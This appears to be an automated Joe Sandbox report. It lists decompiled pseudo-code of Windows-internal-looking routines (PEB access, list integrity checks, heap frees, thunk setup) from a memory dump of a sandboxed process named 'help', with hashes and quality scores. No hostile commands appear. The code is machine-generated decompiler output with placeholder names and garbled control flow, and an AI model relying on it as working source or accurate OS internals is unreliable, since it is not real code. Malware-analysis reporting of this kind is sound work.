                            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                            • Instruction Fuzzy Hash: 87110276504208BBCB15DFAD98809BEB7B9EF89300F1080AAF944CB350DA318D51D7A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E038037F5(void* __ecx, intOrPtr* __edx) {
                            				void* __ebx;
                            				void* __edi;
                            				signed char _t6;
                            				intOrPtr _t13;
                            				intOrPtr* _t20;
                            				intOrPtr* _t27;
                            				void* _t28;
                            				intOrPtr* _t29;
                            
                            				_t27 = __edx;
                            				_t28 = __ecx;
                            				if(__edx == 0) {
                            					E037E2280(_t6, 0x38b8550);
                            				}
                            				_t29 = E0380387E(_t28);
                            				if(_t29 == 0) {
                            					L6:
                            					if(_t27 == 0) {
                            						E037DFFB0(0x38b8550, _t27, 0x38b8550);
                            					}
                            					if(_t29 == 0) {
                            						return 0xc0000225;
                            					} else {
                            						if(_t27 != 0) {
                            							goto L14;
                            						}
                            						L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                            						goto L11;
                            					}
                            				} else {
                            					_t13 =  *_t29;
                            					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                            						L13:
                            						_push(3);
                            						asm("int 0x29");
                            						L14:
                            						 *_t27 = _t29;
                            						L11:
                            						return 0;
                            					}
                            					_t20 =  *((intOrPtr*)(_t29 + 4));
                            					if( *_t20 != _t29) {
                            						goto L13;
                            					}
                            					 *_t20 = _t13;
                            					 *((intOrPtr*)(_t13 + 4)) = _t20;
                            					asm("btr eax, ecx");
                            					goto L6;
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 31350f1f037fd36802ccf006d9752ef495df1a04234ae3f6906aed9b6dbad78f
                            • Instruction ID: 9aeee41274d82e55b25b291fcadd315148c20e5d3339537d934a7d422bb81c5a
                            • Opcode Fuzzy Hash: 31350f1f037fd36802ccf006d9752ef495df1a04234ae3f6906aed9b6dbad78f
                            • Instruction Fuzzy Hash: 9E01267AA016109BC37BCB999D80E26BBAADF85B5071940EDE805CF390DB70C800C780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 42%
                            			E037CC962(char __ecx) {
                            				signed int _v8;
                            				intOrPtr _v12;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* _t19;
                            				char _t22;
                            				void* _t26;
                            				void* _t27;
                            				char _t32;
                            				char _t34;
                            				void* _t35;
                            				void* _t37;
                            				intOrPtr* _t38;
                            				signed int _t39;
                            
                            				_t41 = (_t39 & 0xfffffff8) - 0xc;
                            				_v8 =  *0x38bd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                            				_t34 = __ecx;
                            				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                            					_t26 = 0;
                            					E037DEEF0(0x38b70a0);
                            					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                            					if(E0384F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                            						L9:
                            						E037DEB70(_t29, 0x38b70a0);
                            						_t19 = _t26;
                            						L2:
                            						_pop(_t35);
                            						_pop(_t37);
                            						_pop(_t27);
                            						return E0380B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                            					}
                            					_t29 = _t34;
                            					_t26 = E0384F1FC(_t34, _t32);
                            					if(_t26 < 0) {
                            						goto L9;
                            					}
                            					_t38 =  *0x38b70c0; // 0x0
                            					while(_t38 != 0x38b70c0) {
                            						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                            						_t38 =  *_t38;
                            						_v12 = _t22;
                            						if(_t22 != 0) {
                            							_t29 = _t22;
                            							 *0x38bb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                            							_v12();
                            						}
                            					}
                            					goto L9;
                            				}
                            				_t19 = 0;
                            				goto L2;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9f8f372580ce2e148f3355902fa9a4e0796b2a8e982073901b82a2a7001c74b5
                            • Instruction ID: 3ae77c54c17fdba9425b38c23a482b1d26b9a93221d7268f76d095cf23212085
                            • Opcode Fuzzy Hash: 9f8f372580ce2e148f3355902fa9a4e0796b2a8e982073901b82a2a7001c74b5
                            • Instruction Fuzzy Hash: 3311C2313007469BC711EFA8CC4596AB7B5BF85610B0405A9F945C7B51EB20EC16D7D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E037F002D() {
                            				void* _t11;
                            				char* _t14;
                            				signed char* _t16;
                            				char* _t27;
                            				signed char* _t29;
                            
                            				_t11 = E037E7D50();
                            				_t27 = 0x7ffe0384;
                            				if(_t11 != 0) {
                            					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            				} else {
                            					_t14 = 0x7ffe0384;
                            				}
                            				_t29 = 0x7ffe0385;
                            				if( *_t14 != 0) {
                            					if(E037E7D50() == 0) {
                            						_t16 = 0x7ffe0385;
                            					} else {
                            						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            					}
                            					if(( *_t16 & 0x00000040) != 0) {
                            						goto L18;
                            					} else {
                            						goto L3;
                            					}
                            				} else {
                            					L3:
                            					if(E037E7D50() != 0) {
                            						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            					}
                            					if( *_t27 != 0) {
                            						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                            							goto L5;
                            						}
                            						if(E037E7D50() != 0) {
                            							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            						}
                            						if(( *_t29 & 0x00000020) == 0) {
                            							goto L5;
                            						}
                            						L18:
                            						return 1;
                            					} else {
                            						L5:
                            						return 0;
                            					}
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                            • Instruction ID: e02239ee485646ea8389c5cdb9e8f9bc6184e39e14af43f6d10e495aa1c8318e
                            • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                            • Instruction Fuzzy Hash: 99118B366056C9CFD722DBEAD948B357798BB46754F0D00E0DE04DB7A2E738D841C6A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E037D766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                            				char _v8;
                            				void* _t22;
                            				void* _t24;
                            				intOrPtr _t29;
                            				intOrPtr* _t30;
                            				void* _t42;
                            				intOrPtr _t47;
                            
                            				_push(__ecx);
                            				_t36 =  &_v8;
                            				if(E037FF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                            					L10:
                            					_t22 = 0;
                            				} else {
                            					_t24 = _v8 + __ecx;
                            					_t42 = _t24;
                            					if(_t24 < __ecx) {
                            						goto L10;
                            					} else {
                            						if(E037FF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                            							goto L10;
                            						} else {
                            							_t29 = _v8 + _t42;
                            							if(_t29 < _t42) {
                            								goto L10;
                            							} else {
                            								_t47 = _t29;
                            								_t30 = _a16;
                            								if(_t30 != 0) {
                            									 *_t30 = _t47;
                            								}
                            								if(_t47 == 0) {
                            									goto L10;
                            								} else {
                            									_t22 = L037E4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _t22;
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                            • Instruction ID: ee89b99af7b6d9e5b07c37f708259883c6fa7a18c4dd284072730be28aff6247
                            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                            • Instruction Fuzzy Hash: 99018432700259AFC724DE5ECC85F5BB7BDEB84A60B280529B908CF250EA30DD1197A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 46%
                            			E0385C450(intOrPtr* _a4) {
                            				signed char _t25;
                            				intOrPtr* _t26;
                            				intOrPtr* _t27;
                            
                            				_t26 = _a4;
                            				_t25 =  *(_t26 + 0x10);
                            				if((_t25 & 0x00000003) != 1) {
                            					_push(0);
                            					_push(0);
                            					_push(0);
                            					_push( *((intOrPtr*)(_t26 + 8)));
                            					_push(0);
                            					_push( *_t26);
                            					E03809910();
                            					_t25 =  *(_t26 + 0x10);
                            				}
                            				if((_t25 & 0x00000001) != 0) {
                            					_push(4);
                            					_t7 = _t26 + 4; // 0x4
                            					_t27 = _t7;
                            					_push(_t27);
                            					_push(5);
                            					_push(0xfffffffe);
                            					E038095B0();
                            					if( *_t27 != 0) {
                            						_push( *_t27);
                            						E038095D0();
                            					}
                            				}
                            				_t8 = _t26 + 0x14; // 0x14
                            				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                            					L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                            				}
                            				_push( *_t26);
                            				E038095D0();
                            				return L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                            			}

                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                            • Instruction ID: e2dcb3e0349f8e84c5c7642b8b70f2c0d8d17085679346818840afa0f093264e
                            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                            • Instruction Fuzzy Hash: 1101DE76140705BFD725EFA9CC80E62FB7EFF44391F044129F2048A5B0CB22ACA0CAA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 69%
                            			E037C9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                            				intOrPtr* _t51;
                            				intOrPtr _t59;
                            				signed int _t64;
                            				signed int _t67;
                            				signed int* _t71;
                            				signed int _t74;
                            				signed int _t77;
                            				signed int _t82;
                            				intOrPtr* _t84;
                            				void* _t85;
                            				intOrPtr* _t87;
                            				void* _t94;
                            				signed int _t95;
                            				intOrPtr* _t97;
                            				signed int _t99;
                            				signed int _t102;
                            				void* _t104;
                            
                            				_push(__ebx);
                            				_push(__esi);
                            				_push(__edi);
                            				_t97 = __ecx;
                            				_t102 =  *(__ecx + 0x14);
                            				if((_t102 & 0x02ffffff) == 0x2000000) {
                            					_t102 = _t102 | 0x000007d0;
                            				}
                            				_t48 =  *[fs:0x30];
                            				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                            					_t102 = _t102 & 0xff000000;
                            				}
                            				_t80 = 0x38b85ec;
                            				E037E2280(_t48, 0x38b85ec);
                            				_t51 =  *_t97 + 8;
                            				if( *_t51 != 0) {
                            					L6:
                            					return E037DFFB0(_t80, _t97, _t80);
                            				} else {
                            					 *(_t97 + 0x14) = _t102;
                            					_t84 =  *0x38b538c; // 0x77de6848
                            					if( *_t84 != 0x38b5388) {
                            						_t85 = 3;
                            						asm("int 0x29");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						asm("int3");
                            						_push(0x2c);
                            						_push(0x389f6e8);
                            						E0381D0E8(0x38b85ec, _t97, _t102);
                            						 *((char*)(_t104 - 0x1d)) = 0;
                            						_t99 =  *(_t104 + 8);
                            						__eflags = _t99;
                            						if(_t99 == 0) {
                            							L13:
                            							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                            							if(__eflags == 0) {
                            								E038988F5(_t80, _t85, 0x38b5388, _t99, _t102, __eflags);
                            							}
                            						} else {
                            							__eflags = _t99 -  *0x38b86c0; // 0x31d07b0
                            							if(__eflags == 0) {
                            								goto L13;
                            							} else {
                            								__eflags = _t99 -  *0x38b86b8; // 0x0
                            								if(__eflags == 0) {
                            									goto L13;
                            								} else {
                            									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                            									__eflags =  *((char*)(_t59 + 0x28));
                            									if( *((char*)(_t59 + 0x28)) == 0) {
                            										E037E2280(_t99 + 0xe0, _t99 + 0xe0);
                            										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                            										__eflags =  *((char*)(_t99 + 0xe5));
                            										if(__eflags != 0) {
                            											E038988F5(0x38b85ec, _t85, 0x38b5388, _t99, _t102, __eflags);
                            										} else {
                            											__eflags =  *((char*)(_t99 + 0xe4));
                            											if( *((char*)(_t99 + 0xe4)) == 0) {
                            												 *((char*)(_t99 + 0xe4)) = 1;
                            												_push(_t99);
                            												_push( *((intOrPtr*)(_t99 + 0x24)));
                            												E0380AFD0();
                            											}
                            											while(1) {
                            												_t71 = _t99 + 8;
                            												 *(_t104 - 0x2c) = _t71;
                            												_t80 =  *_t71;
                            												_t95 = _t71[1];
                            												 *(_t104 - 0x28) = _t80;
                            												 *(_t104 - 0x24) = _t95;
                            												while(1) {
                            													L19:
                            													__eflags = _t95;
                            													if(_t95 == 0) {
                            														break;
                            													}
                            													_t102 = _t80;
                            													 *(_t104 - 0x30) = _t95;
                            													 *(_t104 - 0x24) = _t95 - 1;
                            													asm("lock cmpxchg8b [edi]");
                            													_t80 = _t102;
                            													 *(_t104 - 0x28) = _t80;
                            													 *(_t104 - 0x24) = _t95;
                            													__eflags = _t80 - _t102;
                            													_t99 =  *(_t104 + 8);
                            													if(_t80 != _t102) {
                            														continue;
                            													} else {
                            														__eflags = _t95 -  *(_t104 - 0x30);
                            														if(_t95 !=  *(_t104 - 0x30)) {
                            															continue;
                            														} else {
                            															__eflags = _t95;
                            															if(_t95 != 0) {
                            																_t74 = 0;
                            																 *(_t104 - 0x34) = 0;
                            																_t102 = 0;
                            																__eflags = 0;
                            																while(1) {
                            																	 *(_t104 - 0x3c) = _t102;
                            																	__eflags = _t102 - 3;
                            																	if(_t102 >= 3) {
                            																		break;
                            																	}
                            																	__eflags = _t74;
                            																	if(_t74 != 0) {
                            																		L49:
                            																		_t102 =  *_t74;
                            																		__eflags = _t102;
                            																		if(_t102 != 0) {
                            																			_t102 =  *(_t102 + 4);
                            																			__eflags = _t102;
                            																			if(_t102 != 0) {
                            																				 *0x38bb1e0(_t74, _t99);
                            																				 *_t102();
                            																			}
                            																		}
                            																		do {
                            																			_t71 = _t99 + 8;
                            																			 *(_t104 - 0x2c) = _t71;
                            																			_t80 =  *_t71;
                            																			_t95 = _t71[1];
                            																			 *(_t104 - 0x28) = _t80;
                            																			 *(_t104 - 0x24) = _t95;
                            																			goto L19;
                            																		} while (_t74 == 0);
                            																		goto L49;
                            																	} else {
                            																		_t82 = 0;
                            																		__eflags = 0;
                            																		while(1) {
                            																			 *(_t104 - 0x38) = _t82;
                            																			__eflags = _t82 -  *0x38b84c0;
                            																			if(_t82 >=  *0x38b84c0) {
                            																				break;
                            																			}
                            																			__eflags = _t74;
                            																			if(_t74 == 0) {
                            																				_t77 = E03899063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                            																				__eflags = _t77;
                            																				if(_t77 == 0) {
                            																					_t74 = 0;
                            																					__eflags = 0;
                            																				} else {
                            																					_t74 = _t77 + 0xfffffff4;
                            																				}
                            																				 *(_t104 - 0x34) = _t74;
                            																				_t82 = _t82 + 1;
                            																				continue;
                            																			}
                            																			break;
                            																		}
                            																		_t102 = _t102 + 1;
                            																		continue;
                            																	}
                            																	goto L20;
                            																}
                            																__eflags = _t74;
                            															}
                            														}
                            													}
                            													break;
                            												}
                            												L20:
                            												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                            												 *((char*)(_t99 + 0xe5)) = 1;
                            												 *((char*)(_t104 - 0x1d)) = 1;
                            												goto L21;
                            											}
                            										}
                            										L21:
                            										 *(_t104 - 4) = 0xfffffffe;
                            										E037C922A(_t99);
                            										_t64 = E037E7D50();
                            										__eflags = _t64;
                            										if(_t64 != 0) {
                            											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            										} else {
                            											_t67 = 0x7ffe0386;
                            										}
                            										__eflags =  *_t67;
                            										if( *_t67 != 0) {
                            											_t67 = E03898B58(_t99);
                            										}
                            										__eflags =  *((char*)(_t104 - 0x1d));
                            										if( *((char*)(_t104 - 0x1d)) != 0) {
                            											__eflags = _t99 -  *0x38b86c0; // 0x31d07b0
                            											if(__eflags != 0) {
                            												__eflags = _t99 -  *0x38b86b8; // 0x0
                            												if(__eflags == 0) {
                            													_t94 = 0x38b86bc;
                            													_t87 = 0x38b86b8;
                            													goto L27;
                            												} else {
                            													__eflags = _t67 | 0xffffffff;
                            													asm("lock xadd [edi], eax");
                            													if(__eflags == 0) {
                            														E037C9240(_t80, _t99, _t99, _t102, __eflags);
                            													}
                            												}
                            											} else {
                            												_t94 = 0x38b86c4;
                            												_t87 = 0x38b86c0;
                            												L27:
                            												E037F9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                            											}
                            										}
                            									} else {
                            										goto L13;
                            									}
                            								}
                            							}
                            						}
                            						return E0381D130(_t80, _t99, _t102);
                            					} else {
                            						 *_t51 = 0x38b5388;
                            						 *((intOrPtr*)(_t51 + 4)) = _t84;
                            						 *_t84 = _t51;
                            						 *0x38b538c = _t51;
                            						goto L6;
                            					}
                            				}
                            			}





















                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c438b1eef97584e0f3c1a1edefac7e741abbb650d10ff215facec44575e61f8f
                            • Instruction ID: 425431940dcdc53d9563d25b22af83d3d4b77f31523011932c863f1ad0a8d364
                            • Opcode Fuzzy Hash: c438b1eef97584e0f3c1a1edefac7e741abbb650d10ff215facec44575e61f8f
                            • Instruction Fuzzy Hash: 9B01817251164A8FC355DF14D840B11BBB9EB87721F2940AEE605CF792D774DC81CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E03894015(signed int __eax, signed int __ecx) {
                            				void* __ebx;
                            				void* __edi;
                            				signed char _t10;
                            				signed int _t28;
                            
                            				_push(__ecx);
                            				_t28 = __ecx;
                            				asm("lock xadd [edi+0x24], eax");
                            				_t10 = (__eax | 0xffffffff) - 1;
                            				if(_t10 == 0) {
                            					_t1 = _t28 + 0x1c; // 0x1e
                            					E037E2280(_t10, _t1);
                            					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                            					E037E2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x38b86ac);
                            					E037CF900(0x38b86d4, _t28);
                            					E037DFFB0(0x38b86ac, _t28, 0x38b86ac);
                            					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                            					E037DFFB0(0, _t28, _t1);
                            					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                            					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                            						L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                            					}
                            					_t10 = L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                            				}
                            				return _t10;
                            			}








                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1455202b2333b8dc8b430a25c950ad996860b13d6aebeb9fbba34e0845c6dc3b
                            • Instruction ID: 604e57e983fe1369a9be98799c52ecd0c0ce10b9d1999a7e7a6619b3ce011aa5
                            • Opcode Fuzzy Hash: 1455202b2333b8dc8b430a25c950ad996860b13d6aebeb9fbba34e0845c6dc3b
                            • Instruction Fuzzy Hash: 5F01D476201689BFD614EB69CD88E13B7ACEB49650B050269F508CBA11CB24EC11C6E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 61%
                            			E0388138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                            				signed int _v8;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				short _v54;
                            				char _v60;
                            				void* __edi;
                            				void* __esi;
                            				signed char* _t21;
                            				intOrPtr _t27;
                            				intOrPtr _t33;
                            				intOrPtr _t34;
                            				signed int _t35;
                            
                            				_t32 = __edx;
                            				_t27 = __ebx;
                            				_v8 =  *0x38bd360 ^ _t35;
                            				_t33 = __edx;
                            				_t34 = __ecx;
                            				E0380FA60( &_v60, 0, 0x30);
                            				_v20 = _a4;
                            				_v16 = _a8;
                            				_v28 = _t34;
                            				_v24 = _t33;
                            				_v54 = 0x1033;
                            				if(E037E7D50() == 0) {
                            					_t21 = 0x7ffe0388;
                            				} else {
                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                            				}
                            				_push( &_v60);
                            				_push(0x10);
                            				_push(0x20402);
                            				_push( *_t21 & 0x000000ff);
                            				return E0380B640(E03809AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                            			}


















                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 904f070814138f907cdd0e7de581eee14dcdd9597e83b458567d8f69a504ce87
                            • Instruction ID: d1e3c3181dc372cb26617579ca16d91204be1b0ed0060c97785f0fc8008509ca
                            • Opcode Fuzzy Hash: 904f070814138f907cdd0e7de581eee14dcdd9597e83b458567d8f69a504ce87
                            • Instruction Fuzzy Hash: CB015275A0035CAFCB14EFA9D845EAEB7B8EF44710F5040A6F904EB281EA74DA01C795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 61%
                            			E038814FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                            				signed int _v8;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				short _v54;
                            				char _v60;
                            				void* __edi;
                            				void* __esi;
                            				signed char* _t21;
                            				intOrPtr _t27;
                            				intOrPtr _t33;
                            				intOrPtr _t34;
                            				signed int _t35;
                            
                            				_t32 = __edx;
                            				_t27 = __ebx;
                            				_v8 =  *0x38bd360 ^ _t35;
                            				_t33 = __edx;
                            				_t34 = __ecx;
                            				E0380FA60( &_v60, 0, 0x30);
                            				_v20 = _a4;
                            				_v16 = _a8;
                            				_v28 = _t34;
                            				_v24 = _t33;
                            				_v54 = 0x1034;
                            				if(E037E7D50() == 0) {
                            					_t21 = 0x7ffe0388;
                            				} else {
                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                            				}
                            				_push( &_v60);
                            				_push(0x10);
                            				_push(0x20402);
                            				_push( *_t21 & 0x000000ff);
                            				return E0380B640(E03809AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                            			}


















                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c9bb0de5ff881dbd9c0622b225b5ee1571cb461218cbe39a8240a79e7f92bb4
                            • Instruction ID: 5a50a97087c3adcd450083092f381910bbd50bad8b6ed757d0d7005222565054
                            • Opcode Fuzzy Hash: 8c9bb0de5ff881dbd9c0622b225b5ee1571cb461218cbe39a8240a79e7f92bb4
                            • Instruction Fuzzy Hash: 78018075A01248ABCB14EFA8D845EAEB7B8EF44710F4040A6F914EB380DA70DA01CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 91%
                            			E037C58EC(intOrPtr __ecx) {
                            				signed int _v8;
                            				char _v28;
                            				char _v44;
                            				char _v76;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr _t10;
                            				intOrPtr _t16;
                            				intOrPtr _t17;
                            				intOrPtr _t27;
                            				intOrPtr _t28;
                            				signed int _t29;
                            
                            				_v8 =  *0x38bd360 ^ _t29;
                            				_t10 =  *[fs:0x30];
                            				_t27 = __ecx;
                            				if(_t10 == 0) {
                            					L6:
                            					_t28 = 0x37a5c80;
                            				} else {
                            					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                            					if(_t16 == 0) {
                            						goto L6;
                            					} else {
                            						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                            					}
                            				}
                            				if(E037C5943() != 0 &&  *0x38b5320 > 5) {
                            					E03847B5E( &_v44, _t27);
                            					_t22 =  &_v28;
                            					E03847B5E( &_v28, _t28);
                            					_t11 = E03847B9C(0x38b5320, 0x37abf15,  &_v28, _t22, 4,  &_v76);
                            				}
                            				return E0380B640(_t11, _t17, _v8 ^ _t29, 0x37abf15, _t27, _t28);
                            			}
















                            Memory Dump Source
                            • Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true
                            • Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmp
                            • Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_37a0000_help.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7dc6fedc0f710226db43b871414bacd828fea3acebe82d104713c85303238d2c
